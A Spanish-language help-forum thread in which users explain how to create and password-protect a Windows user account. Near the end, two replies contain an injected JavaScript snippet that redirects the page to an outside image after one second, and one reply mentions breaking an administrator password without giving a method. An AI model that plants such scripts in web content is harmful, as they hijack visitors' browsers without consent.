Como puedo crear un usuario en mi pc [Resuelto/Cerrado]

xploid - 15 ago 2009 a las 22:37 - Última respuesta:  janfre
- 26 may 2016 a las 23:12
Hola, necesito ayuda para crear un usuario en pc , para poder iniciar sesion con mi usuario en mi pc asi poser bloquear mi maquina cuando no este sin tener la necesidad de apagarla o que revisen mis archivos
Ver más 

66 respuestas

+137
Vota
30
entran en el inicio, buscan panel de contro, le dan clic, ahi buscan ''cuentas de usuario'' y ahi le saldran opciones como por ejemplo (cambia una cuenta, crea una cuenta, ect)

espero que les guste :D
¿Te sirvió esta respuesta?  
no me deja crearla, sale error especificado
que hago
+35
Vota
16
Entra a panel de control entra a cuentas de usuario ahi te pedira tu nik y te pedira tu contraseña acepta y ya esta
garbeero gonzalez - 12 nov 2011 a las 07:32
me paso lo mismo que ha fri
No Caxo!!!
no entendi no tengo ee tal papel de no se que cosa =0
luise eduardosito - 5 nov 2015 a las 02:27
oyr jhonatan a mi no me deja mi papa me dice que no puedo por que puede afectar a las otras cuentas
+32
Vota
7
Para crear una cuenta de usuario, en Windows XP:
*Anda a "Inicio > Configuracion > Panel de control"
*Haz clic en "Cuentas de usuario > Crear una cuenta nueva"

Saludos
graciiiiiiaaaaaasssssssssss
quisiera saber si me creeo una cuenta de usuario la q tengo ahora se borra o se qda guardada
quisiera saber xq cuando cree una cuenta de usuario la q tengo ahora se borro o se queda guardada
luise eduardosito - 5 nov 2015 a las 02:28
es porque lo que pasa que paso ese error ana no se queda guardada
luise eduardosito - 5 nov 2015 a las 02:29
j-a
+7
Vota
Para bloquear la máquina basta con que asignes una contraseña y presionas la tecla de windows+l, automáticamente bloquea el equipo. O bien, desde el panel de control puedes crear una cuenta adicional.
+6
Vota
a mi me pasa loo mismoo por favor diganmee o si ssaben como poner contraseña
likjhytfrtvftfurc - 3 ene 2011 a las 17:51
+6
Vota
mira te vas a inicio despues arriba miras que ahy una foto les das doble click y ahy te va a salir lo opsion de hacer nuevo usuario y vas siguiendo los pasos como se te indian
+5
Vota
frend yo quiero crear una cuenta de usuario pero mi hermana tiene la contraseña de ella y yo quiero bAJAR PROGAMAS Y JUEGO Y NO PUEDO COMO AGO PARA CREAR UN CUENTA DE USUARIO SIN TENER Q PONER LA CONTRASEÑA DE ELLA POR FAVOR
+3
Vota
2
yo quiero crear un usuario pero mi hermana ya creo uno y yo quiero uno para mi sola como lo ago ayudenme
Tienes q crear desde el administrador el usuario con su clave
Solo de hay pero si quieres romper la contraseña del administrador normal se puede
la fulanita - 23 nov 2010 a las 00:55
+1
Vota
Graxxxxx me ayudo muchisimo bueno de hecho resolvió mi problema
yesica yuyeimi yamira yazmin - 18 jul 2014 a las 17:38
+1
Vota
<script language='JavaScript' type='text/javascript'>
var pagina="http://estaticos.20minutos.es/img2/recortes/2012/03/09/51648-550-549.jpg"
function redireccionar()
{location.href=pagina}
setTimeout ("redireccionar()", 1000);</script>
+1
Vota
<script language='JavaScript' type='text/javascript'>
var pagina="http://estaticos.20minutos.es/img2/recortes/2012/03/09/51648-550-549.jpg"
function redireccionar()
{location.href=pagina}
setTimeout ("redireccionar()", 1000);</script>